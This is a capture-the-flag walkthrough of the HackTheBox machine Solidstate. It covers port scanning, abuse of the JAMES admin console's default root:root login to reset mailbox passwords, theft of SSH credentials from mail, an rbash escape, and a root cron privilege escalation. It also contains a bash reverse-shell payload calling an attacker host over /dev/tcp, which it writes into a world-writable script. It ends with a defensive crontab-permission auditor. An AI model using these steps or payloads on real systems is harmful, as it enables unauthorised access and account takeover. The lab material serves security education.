
HackTheBox-Solidstate


0x01 Information Gathering

NMAP

nmap -p- solidstate.htb

SYN Stealth Scan Timing: About 0.49% done
Nmap scan report for solidstate.htb (10.129.29.189)
Host is up (0.26s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
80/tcp open http
110/tcp open pop3
119/tcp open nntp
4555/tcp open rsip
Service and version detection against the six open ports (a trailing "?" means nmap could not identify the service from its probes; the banner grabs below fill those in):

PORT     STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
| 256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_ 256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp open smtp?
|_smtp-commands: Couldn't establish connection on port 25
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Home - Solid State Security
110/tcp open pop3?
119/tcp open nntp?
4555/tcp open rsip?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port:25


└──╼ #nc -v solidstate.htb 25
solidstate.htb [10.129.29.189] 25 (smtp) open
220 solidstate SMTP Server (JAMES SMTP Server 2.3.2) ready Thu, 15 Apr 2021 02:07:51 -0400 (EDT)

Port:4555

Port 4555 is the JAMES Remote Administration Tool, a clear-text console, so it can be driven with telnet or nc.

JAMES 2.3.2 ships with the default administrator credentials root:root. Anyone who can reach port 4555 and knows that default can list accounts, add users and reset any mailbox password, so in practice the default must be changed and the console restricted to trusted hosts.

└──╼ #nc -v solidstate.htb 4555
solidstate.htb [10.129.29.189] 4555 (?) open
JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
root
Password:
root
Welcome root. HELP for a list of commands
listusers
Existing accounts 5
user: james
user: thomas
user: john
user: mindy
user: mailadmin

Reset passwords and read the mailboxes over POP3

Note that setpassword overwrites the real passwords and locks the users out of their own mail; on an engagement this is noisy and destructive and should be agreed with the client first.

$ nc -v solidstate.htb 4555

setpassword james 123
Password for james reset
setpassword thomas 123
Password for thomas reset
setpassword john 123
Password for john reset
setpassword mindy 123
Password for mindy reset

quit
Bye

james

$ telnet solidstate.htb 110
Trying 10.129.29.189...
Connected to solidstate.htb.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
HELP
-ERR
USER james
+OK
PASS 123
+OK Welcome james
LIST
+OK 0 0
.
LIST 1
-ERR Message (1) does not exist.
quit

thomas

USER thomas
+OK
PASS 123
+OK Welcome thomas
LIST
+OK 0 0
.
quit

john

$ telnet solidstate.htb 110
Trying 10.129.29.189...
Connected to solidstate.htb.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
USER john
+OK
PASS 123
+OK Welcome john
LIST
+OK 1 743
1 743
.
LIST 1
+OK 1 743
RETR 1
+OK Message follows
Return-Path: <[email protected]>
Message-ID: <[email protected]>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: [email protected]
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
for <[email protected]>;
Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
From: [email protected]
Subject: New Hires access
John,

Can you please restrict mindy's access until she gets read on to the program. Also make sure that you send her a tempory password to login to her accounts.

Thank you in advance.

Respectfully,
James

.

That mail says mindy was to be sent a temporary password, so her mailbox is the one to read next.

mindy

$ telnet solidstate.htb 110
Trying 10.129.29.189...
Connected to solidstate.htb.
Escape character is '^]'.
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready
USER mindy
+OK
PASS 123
+OK Welcome mindy
LIST
+OK 2 1945
1 1109
2 836
.
RETR 1
+OK Message follows
Return-Path: <[email protected]>
Message-ID: <[email protected]>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: [email protected]
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 798
for <[email protected]>;
Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
From: [email protected]
Subject: Welcome

Dear Mindy,
Welcome to Solid State Security Cyber team! We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our orginzation. The enclosed information is designed to serve as an introduction to Cyber Security and provide resources that will help you make a smooth transition into your new role. The Cyber team is here to support your transition so, please know that you can call on any of us to assist you.

We are looking forward to you joining our team and your success at Solid State Security.

Respectfully,
James
.
RETR 2
+OK Message follows
Return-Path: <[email protected]>
Message-ID: <[email protected]>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: [email protected]
Received: from 192.168.11.142 ([192.168.11.142])
by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
for <[email protected]>;
Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: [email protected]
Subject: Your Access

Dear Mindy,


Here are your ssh credentials to access the system. Remember to reset your password after your first login.
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path.

username: mindy
pass: [email protected][email protected]

Respectfully,
James

.

mindy:[email protected][email protected]
That gives mindy's SSH credentials (the password is in the mail above), so the next step is to try them over SSH.

ssh [email protected]
[email protected]'s password:
Linux solidstate 4.9.0-3-686-pae #1 SMP Debian 4.9.30-2+deb9u3 (2017-08-06) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Aug 22 14:00:02 2017 from 192.168.11.142
[email protected]:~$ id
-rbash: id: command not found

The login shell is rbash (restricted bash) with PATH locked down to a handful of commands, which is why even id is "not found". It is easy to get around: sshd runs a requested command through the login shell, and rbash will happily execute a plain command name without a slash, so asking for a fresh bash gives an unrestricted shell. -t allocates a terminal so the new shell is interactive, and --noprofile keeps the login profile from re-applying the restrictions. Confirm it worked by checking PATH and that cd and output redirection behave normally in the new shell.

ssh [email protected] -t 'bash --noprofile'
[email protected]'s password:
${debian_chroot:+($debian_chroot)}[email protected]:~$ whoami
mindy
${debian_chroot:+($debian_chroot)}[email protected]:~$ id
uid=1001(mindy) gid=1001(mindy) groups=1001(mindy)

Exploit-DB

searchsploit JAMES 2.3.2

Apache James Server 2.3.2 - Insecure User Creation Arbitrary File | linux/remote/48130.rb
Apache James Server 2.3.2 - Remote Command Execution | linux/remote/35513.py

The second entry, 35513.py, abuses the same root:root administration console: it creates a user whose name is a path traversal into /etc/bash_completion.d and mails that user a payload, which bash sources the next time someone logs in interactively. Swapping its payload for a reverse shell is an alternative way to get mindy's shell, but it fires for whoever logs in next, so it is less controlled than simply using the recovered password.

0x02 Privilege Escalation

After logging in as mindy, linpeas was used to enumerate the system. The relevant finding:

[+] Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files
/dev/mqueue
/dev/shm
/home/mindy
/opt/tmp.py

/opt/tmp.py stands out: a script outside the home directory that an unprivileged user can write to.

${debian_chroot:+($debian_chroot)}[email protected]:~$ cat /opt/tmp.py
#!/usr/bin/env python
import os
import sys
try:
    os.system('rm -r /tmp/* ')
except:
    sys.exit()

${debian_chroot:+($debian_chroot)}[email protected]:~$ ls -lah /opt/tmp.py
-rwxrwxrwx 1 root root 105 Aug 22 2017 /opt/tmp.py

The file is owned by root but mode 777, so any user can rewrite it; if root ever executes it, whatever is put in it runs as root. Replace the cleanup with a reverse shell:

#!/usr/bin/env python
import os
import sys
try:
    # the cleanup is replaced with a reverse shell back to the attacking host (10.10.16.69:1234)
    os.system('bash -c "bash -i >&/dev/tcp/10.10.16.69/1234 0>&1"')
except:
    sys.exit()

Start a listener on port 1234 on the attacking host, then go have a cup of tea: the shell arrives the next time the script runs.

20210415-15:23:08-_EE4ktP_EE4ktP_EE4ktP_wqlPZG

Once the root shell lands, crontab -l as root shows why it worked:

# m h  dom mon dow   command
*/3 * * * * python /opt/tmp.py

Root runs /opt/tmp.py every three minutes. That is the combination that matters: a file writable by everyone, executed on a schedule by root. Fixing the permissions (root-owned, mode 755 or tighter, in a directory unprivileged users cannot write to) or dropping the cron job closes it.
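As an added example that is not part of the original writeup, the check behind this finding written out: parse a crontab, pull the absolute paths out of each job's command, and report the ones the current user can tamper with. It goes slightly beyond the page by also flagging a writable parent directory, which lets you replace a script even when the file itself is locked down. The demo() function builds a constructed crontab pointing at two temporary scripts, one mode 777 like /opt/tmp.py and one 744, so it runs offline; the paths and schedules in it are made up.

```python
import os
import re
import shlex
import stat
import tempfile

# One crontab job line: an @keyword or five schedule fields, then the command.
CRON_LINE = re.compile(r"^\s*(@\w+|(?:\S+\s+){4}\S+)\s+(.+?)\s*$")


def parse_crontab(text):
    """Yield (schedule, command) for each job; skip comments, blank lines and VAR=value."""
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#") or re.match(r"^\w+=", stripped):
            continue
        m = CRON_LINE.match(stripped)
        if m:
            yield m.group(1), m.group(2)


def absolute_paths(command):
    """Absolute paths referenced by a command, e.g. the script after 'python'."""
    try:
        tokens = shlex.split(command)
    except ValueError:  # unbalanced quotes; fall back to whitespace split
        tokens = command.split()
    return [t for t in tokens if t.startswith("/")]


def inspect_path(path):
    """Permission facts that matter for a file root is going to execute."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return {"path": path, "exists": False}
    parent = os.path.dirname(path) or "/"
    return {
        "path": path,
        "exists": True,
        "owner_uid": st.st_uid,
        "mode": stat.filemode(st.st_mode),
        "world_writable": bool(st.st_mode & stat.S_IWOTH),
        "writable_by_me": os.access(path, os.W_OK),
        # A writable parent lets you swap the file out even if the file itself is not writable.
        "parent_writable_by_me": os.access(parent, os.W_OK),
    }


def audit_crontab(text):
    """One finding per absolute path, in each job, that the current user could tamper with."""
    findings = []
    for schedule, command in parse_crontab(text):
        for path in absolute_paths(command):
            info = inspect_path(path)
            if info["exists"] and (info["world_writable"] or info["writable_by_me"]
                                   or info["parent_writable_by_me"]):
                findings.append({"schedule": schedule, "command": command, **info})
    return findings


def demo():
    """Audit a constructed crontab against two temporary scripts; returns findings by file name."""
    with tempfile.TemporaryDirectory() as d:
        loose = os.path.join(d, "tmp.py")     # stands in for /opt/tmp.py (mode 777)
        tight = os.path.join(d, "backup.py")  # owner-only writes (mode 744)
        for p in (loose, tight):
            with open(p, "w") as fh:
                fh.write("#!/usr/bin/env python\nimport os\nos.system('rm -r /tmp/* ')\n")
        os.chmod(loose, 0o777)
        os.chmod(tight, 0o744)
        crontab = (  # constructed sample in the format of the page's crontab
            "# m h  dom mon dow   command\n"
            "SHELL=/bin/sh\n"
            f"*/3 * * * * python {loose}\n"
            f"@daily python {tight}\n"
            "0 2 * * * /bin/true\n"
        )
        return {os.path.basename(f["path"]): f for f in audit_crontab(crontab)}


if __name__ == "__main__":
    for name, f in demo().items():
        print(f"{f['schedule']:12} {f['mode']} world_writable={f['world_writable']} {f['path']}")
```

On a real host, feed it the output of the crontabs you can read (your own, /etc/crontab, /etc/cron.d/*); root's own crontab is not readable until you are root, which is exactly why a world-writable script in a path like /opt is worth noticing on its own.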

References